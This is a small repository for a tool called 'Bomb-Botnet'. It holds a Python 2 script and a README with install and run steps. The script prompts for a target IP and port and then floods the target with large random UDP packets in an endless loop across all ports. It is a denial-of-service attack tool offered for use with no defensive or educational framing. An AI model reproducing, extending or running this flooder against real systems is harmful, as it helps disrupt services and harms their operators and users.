├── Bomb-Botnet.py
└── README.md
/Bomb-Botnet.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin
2 |
3 | import sys
4 | import os
5 | import time
6 | import socket
7 | import random
8 | #Code Time
9 | from datetime import datetime
10 | now = datetime.now()
11 | hour = now.hour
12 | minute = now.minute
13 | day = now.day
14 | month = now.month
15 | year = now.year
16 |
17 | ############## Settings ##############
18 | sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
19 | bytes = random._urandom(10000)
20 | timeout = time.time()
21 | ############# Settings ##############
22 |
23 | os.system ("clear")
24 | print ('''
25 | \033[91m
26 | ::::::::: :::::::: ::::::::::: :::: ::: :::::::::: :::::::::::
27 | :+: :+: :+: :+: :+: :+:+: :+: :+: :+:
28 | +:+ +:+ +:+ +:+ +:+ :+:+:+ +:+ +:+ +:+
29 | +#++:++#+ +#+ +:+ +#+ +#+ +:+ +#+ +#++:++# +#+
30 | +#+ +#+ +#+ +#+ +#+ +#+ +#+#+# +#+ +#+
31 | #+# #+# #+# #+# #+# #+# #+#+# #+# #+#
32 | ######### ######## ### ### #### ########## ###
33 | \033[92m[\033[91mPowered By : Codename\033[92m]
34 | \033[93m[\033[94m127.0.0.1\033[93m]\033[95m|_|\033[93m[\033[94m127.217.21.78\033[93m]
35 | ''')
36 | ip = raw_input("IP Target : ")
37 | port = input("Port : ")
38 |
39 | os.system("clear")
40 | print "\033[91mMission Start DDOS"
41 | print "\033[91m[ ] 0% "
42 | time.sleep(5)
43 | print "\033[92m[===== ] 25%"
44 | time.sleep(5)
45 | print "\033[92m[========== ] 50%"
46 | time.sleep(5)
47 | print "\033[92m[=============== ] 75%"
48 | time.sleep(5)
49 | print "\033[92m[====================] 100%"
50 | time.sleep(3)
51 | os.system ("clear")
52 | sent = 0
53 | while True:
54 | while 1:
55 | if time.time() > timeout:
56 | break
57 | else:
58 | pass
59 | sock.sendto(bytes, (ip,port))
60 | sent = sent + 1
61 | port = port + 1
62 | print "\033[92mSent %s packet to %s throught port:%s successful"%(sent,ip,port)
63 | if port == 65534:
64 | port = 1
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Bomb-Botnet
2 | Tools Bomb-Botnet.
3 |
4 | ## Screenshot
5 |
6 |
7 | #### Installation and Using Bomb-Botnet
8 | ```
9 | apt-get update
10 | apt-get upgrade
11 | apt-get install python2
12 | apt-get install git
13 | git clone https://github.com/nishinosukasa/Bomb-Botnet
14 | cd Bomb-Botnet
15 | python2 Bomb-Botnet.py
16 |
17 | ```
18 |
19 | ## Contact Me
20 | Gmail : siwanna8@gmail.com
21 |
22 | ## Website
23 | https://cruznos.blogspot.com
24 | https://nostalgiaxploit.wordpress.com
25 |
--------------------------------------------------------------------------------